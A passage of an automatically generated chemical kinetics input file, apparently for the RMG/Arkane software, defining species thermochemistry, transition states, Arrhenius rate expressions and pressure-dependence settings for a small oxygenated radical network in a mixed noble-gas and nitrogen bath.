collisionModel = TransportData(shapeIndex=2, epsilon=(3445.77,'J/mol'), sigma=(6.00934,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=538.22 K, Pc=36.03 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.397019,0.0636525,-6.7483e-05,3.67607e-08,-7.35297e-12,49337.1,23.9878], Tmin=(100,'K'), Tmax=(1495.18,'K')), NASAPolynomial(coeffs=[13.9339,0.0117614,3.0255e-07,-4.75729e-10,4.56109e-14,47041.3,-40.905], Tmin=(1495.18,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(409.021,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(274.378,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + ring(Ethylene_oxide) + radical(CJC(C)OC) + radical(Cds_P)"""),
)
species(
label = '[CH]=CC1([O])CC1(10608)',
structure = SMILES('[CH]=CC1([O])CC1'),
E0 = (400.647,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.0236,0.0293171,2.90458e-05,-6.11417e-08,2.61358e-11,48270.6,22.1375], Tmin=(100,'K'), Tmax=(957.69,'K')), NASAPolynomial(coeffs=[13.6268,0.0159885,-5.10864e-06,9.41844e-10,-7.08957e-14,44436.9,-41.7518], Tmin=(957.69,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(400.647,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(278.535,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + ring(Cyclopropane) + radical(C=CC(C)2OJ) + radical(Cds_P)"""),
)
species(
label = '[CH2]C1([CH2])C=CO1(10601)',
structure = SMILES('[CH2]C1([CH2])C=CO1'),
E0 = (334.703,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.743746,0.0528084,-1.44815e-06,-5.91922e-08,3.36566e-11,40390.4,19.4994], Tmin=(100,'K'), Tmax=(901.222,'K')), NASAPolynomial(coeffs=[24.7252,-0.00244371,5.31674e-06,-1.17298e-09,7.92058e-14,33989.2,-105.236], Tmin=(901.222,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(334.703,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(274.378,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsOsH) + ring(Cyclobutene) + radical(CJC(C)OC) + radical(CJC(C)OC)"""),
)
species(
label = '[CH2]C1([O])C=CC1(10609)',
structure = SMILES('[CH2]C1([O])C=CC1'),
E0 = (365.387,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.07739,0.0294263,2.52769e-05,-5.39833e-08,2.26964e-11,44026.6,21.3925], Tmin=(100,'K'), Tmax=(971.675,'K')), NASAPolynomial(coeffs=[12.3604,0.0185831,-6.59314e-06,1.23332e-09,-9.08144e-14,40541.8,-35.5708], Tmin=(971.675,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(365.387,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(278.535,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + ring(Cyclobutene) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ)"""),
)
species(
label = '[CH]C=C([CH2])[CH2](6422)',
structure = SMILES('[CH]C=C([CH2])[CH2]'),
E0 = (604.726,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,350,440,435,1725,3010,987.5,1337.5,450,1655,394.679,394.68,394.681],'cm^-1')),
HinderedRotor(inertia=(0.458026,'amu*angstrom^2'), symmetry=1, barrier=(50.6299,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.458023,'amu*angstrom^2'), symmetry=1, barrier=(50.6299,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.458025,'amu*angstrom^2'), symmetry=1, barrier=(50.6299,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (66.1011,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.81611,0.0388094,1.79234e-07,-2.5992e-08,1.22401e-11,72818.5,19.2374], Tmin=(100,'K'), Tmax=(992.533,'K')), NASAPolynomial(coeffs=[10.7608,0.0238542,-9.09622e-06,1.64932e-09,-1.15256e-13,70004,-29.0822], Tmin=(992.533,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(604.726,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(Allyl_P) + radical(Allyl_P) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH]C=C([CH2])[O](5297)',
structure = SMILES('[CH]C=C([CH2])[O]'),
E0 = (422.945,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,350,440,435,1725,3010,987.5,1337.5,450,1655,416.371,416.371,416.372,416.375],'cm^-1')),
HinderedRotor(inertia=(0.422129,'amu*angstrom^2'), symmetry=1, barrier=(51.9295,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.42211,'amu*angstrom^2'), symmetry=1, barrier=(51.9295,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (68.074,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.98261,0.0391897,-2.01089e-05,-4.46475e-09,5.74562e-12,50946,19.5699], Tmin=(100,'K'), Tmax=(919.32,'K')), NASAPolynomial(coeffs=[10.2652,0.0166702,-5.4224e-06,8.8031e-10,-5.76775e-14,48851.9,-22.799], Tmin=(919.32,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(422.945,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(199.547,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-(Cds-Cd)H) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-CdsCsH) + radical(C=C(C)OJ) + radical(AllylJ2_triplet) + radical(C=C(O)CJ)"""),
)
species(
label = '[CH]C([CH2])([O])C=[CH](10610)',
structure = SMILES('[CH]C([CH2])([O])C=[CH]'),
E0 = (899.709,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,3010,987.5,1337.5,450,1655,3000,3100,440,815,1455,1000,200,800,914.286,1028.57,1142.86,1257.14,1371.43,1485.71,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (81.0926,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.40315,0.0573341,-6.24064e-05,3.60612e-08,-8.37485e-12,108303,26.6946], Tmin=(100,'K'), Tmax=(1043.2,'K')), NASAPolynomial(coeffs=[11.1927,0.0197972,-8.43218e-06,1.56822e-09,-1.08649e-13,106261,-20.9484], Tmin=(1043.2,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(899.709,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ) + radical(CCJ2_triplet) + radical(Cds_P)"""),
)
species(
label = '[C]=CC([CH2])([CH2])[O](10611)',
structure = SMILES('[C]=CC([CH2])([CH2])[O]'),
E0 = (975.943,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,3010,987.5,1337.5,450,1655,200,800,960,1120,1280,1440,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (81.0926,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.29535,0.0640225,-9.25083e-05,7.58144e-08,-2.50647e-11,117472,26.2319], Tmin=(100,'K'), Tmax=(806.771,'K')), NASAPolynomial(coeffs=[8.28829,0.0249368,-1.16298e-05,2.199e-09,-1.51258e-13,116487,-5.11314], Tmin=(806.771,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(975.943,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ) + radical(CdCdJ2_triplet)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.64289,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.53101,-0.000123661,-5.02999e-07,2.43531e-09,-1.40881e-12,-1046.98,2.96747], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.95258,0.0013969,-4.92632e-07,7.8601e-11,-4.60755e-15,-923.949,5.87189], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-8.64289,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'He',
structure = SMILES('[He]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (4.0026,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(84.8076,'J/mol'), sigma=(2.576,'angstroms'), dipoleMoment=(0,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""NOx2018"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""He""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ar',
structure = SMILES('[Ar]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (39.348,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1134.93,'J/mol'), sigma=(3.33,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ar""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (664.937,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (813.102,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (664.937,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (697.96,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (682.852,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (779.436,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (770.374,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (797.446,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (841.214,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (1073.51,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (1114.58,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (822.255,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (670.332,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (673.026,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (673.221,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS16',
E0 = (673.221,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS17',
E0 = (1011.61,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS18',
E0 = (838.631,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS19',
E0 = (1111.51,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS20',
E0 = (1187.75,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['C#C(582)', '[CH2]C(=C)[O](4273)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ]
Euclidian distance = 0
family: 1,4_Linear_birad_scission"""),
)
reaction(
label = 'reaction2',
reactants = ['H(8)', 'C#CC([CH2])([CH2])[O](10603)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(2.276e+10,'cm^3/(mol*s)'), n=1.103, Ea=(20.5476,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 139 used for Ct-Cs_Ct-H;HJ
Exact match found for rate rule [Ct-Cs_Ct-H;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction3',
reactants = ['CH2(T)(28)', '[CH]=CC(=C)[O](5179)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(53.4257,'m^3/(mol*s)'), n=1.6025, Ea=(18.6378,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Cd_R;Y_1centerbirad] for rate rule [CO_O;CH2_triplet]
Euclidian distance = 1.41421356237
family: R_Addition_MultipleBond
Ea raised from -5.8 to 18.6 kJ/mol to match endothermicity of reaction."""),
)
reaction(
label = 'reaction4',
reactants = ['O(T)(63)', '[CH]=CC([CH2])=C(6418)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(53.4257,'m^3/(mol*s)'), n=1.6025, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Cds_Cds;O_atom_triplet]
Euclidian distance = 0
family: R_Addition_MultipleBond
Ea raised from -5.8 to 0 kJ/mol."""),
)
reaction(
label = 'reaction5',
reactants = ['[CH]=[CH](583)', '[CH2]C(=C)[O](4273)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(4679.9,'m^3/(mol*s)'), n=0.573452, Ea=(58.2237,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [CO_O;CJ]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction6',
reactants = ['C#C(582)', '[CH2][C]([CH2])[O](10271)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(46.4627,'m^3/(mol*s)'), n=1.51997, Ea=(27.4714,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Ct-H_Ct-H;CJ]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction7',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['[CH2]C([CH2])([O])[C]=C(10604)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(1.08e+06,'s^-1'), n=1.99, Ea=(105.437,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 17 used for R2H_D;Cd_rad_out_singleH;Cd_H_out_singleNd
Exact match found for rate rule [R2H_D;Cd_rad_out_singleH;Cd_H_out_singleNd]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction8',
reactants = ['[CH]=[C]C([CH2])([CH2])O(10605)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(117344,'s^-1'), n=2.01217, Ea=(123.77,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R3H_SS_Cs;Y_rad_out;O_H_out] + [R3H_SS_Cs;Cd_rad_out;XH_out] for rate rule [R3H_SS_Cs;Cd_rad_out;O_H_out]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction9',
reactants = ['[CH]=[C]C([CH2])(C)[O](10606)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(2.304e+09,'s^-1'), n=1.24, Ea=(151.879,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using an average for rate rule [R3H_SS_Cs;Cd_rad_out;Cs_H_out_2H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 3.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction10',
reactants = ['[CH]=[CH](583)', '[CH2][C]([CH2])[O](10271)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(3.9578e+07,'m^3/(mol*s)'), n=-0.126319, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Recombination
Ea raised from -15.6 to -15.6 kJ/mol.
Ea raised from -15.6 to 0 kJ/mol."""),
)
reaction(
label = 'reaction11',
reactants = ['H(8)', '[CH]=[C]C([CH2])([CH2])[O](10607)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(4.34078e+06,'m^3/(mol*s)'), n=0.278577, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction12',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['[CH][CH]CC(=C)[O](6535)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(2.66e+08,'s^-1'), n=1.36, Ea=(157.318,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [cCsCJ;CsJ-HH;C]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: 1,2_shiftC"""),
)
reaction(
label = 'reaction20',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['[CH]=CC1([CH2])CO1(9310)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(1.18842e+14,'s^-1'), n=0.0123667, Ea=(5.39457,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [Rn;Y_rad_out;Cpri_rad_out_2H] + [R3_SS;Y_rad_out;Ypri_rad_out] for rate rule [R3_SS;O_rad;Cpri_rad_out_2H]
Euclidian distance = 2.2360679775
Multiplied by reaction path degeneracy 2.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction14',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['[CH]=CC1([O])CC1(10608)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(7.38971e+10,'s^-1'), n=0.0476667, Ea=(8.08907,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Rn;C_rad_out_2H;Cpri_rad_out_2H] for rate rule [R3_SS;C_rad_out_2H;Cpri_rad_out_2H]
Euclidian distance = 2.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction15',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['[CH2]C1([CH2])C=CO1(10601)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(1.62e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4;Y_rad_out;Ypri_rad_out] for rate rule [R4_SSD;O_rad;CdsinglepriH_rad_out]
Euclidian distance = 2.44948974278
family: Birad_recombination"""),
)
reaction(
label = 'reaction16',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['[CH2]C1([O])C=CC1(10609)'],
transitionState = 'TS16',
kinetics = Arrhenius(A=(3.24e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4;C_rad_out_2H;Ypri_rad_out] for rate rule [R4_SSD;C_rad_out_2H;CdsinglepriH_rad_out]
Euclidian distance = 2.2360679775
Multiplied by reaction path degeneracy 2.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction17',
reactants = ['O(T)(63)', '[CH]C=C([CH2])[CH2](6422)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS17',
kinetics = Arrhenius(A=(93609.6,'m^3/(mol*s)'), n=1.13083, Ea=(163.847,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""From training reaction 2 used for Y_rad;O_birad
Exact match found for rate rule [Y_rad;O_birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction18',
reactants = ['CH2(T)(28)', '[CH]C=C([CH2])[O](5297)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS18',
kinetics = Arrhenius(A=(1.14854e+06,'m^3/(mol*s)'), n=0.575199, Ea=(34.3157,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction19',
reactants = ['H(8)', '[CH]C([CH2])([O])C=[CH](10610)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS19',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction20',
reactants = ['H(8)', '[C]=CC([CH2])([CH2])[O](10611)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS20',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
network(
label = '2841',
isomers = [
'[CH]=CC([CH2])([CH2])[O](9680)',
],
reactants = [
('C#C(582)', '[CH2]C(=C)[O](4273)'),
],
bathGas = {
'N2': 0.25,
'Ne': 0.25,
'He': 0.25,
'Ar': 0.25,
},
)
pressureDependence(
label = '2841',
Tmin = (1200,'K'),
Tmax = (1500,'K'),
Tcount = 10,
Tlist = ([1201.48,1213.22,1236.21,1269.31,1310.55,1356.92,1404.16,1447.02,1479.84,1497.7],'K'),
Pmin = (1,'atm'),
Pmax = (10,'atm'),
Pcount = 10,
Plist = ([1.02771,1.14872,1.41959,1.89986,2.67608,3.83649,5.40396,7.23219,8.93758,9.98989],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
| [
"[email protected]"
] | |
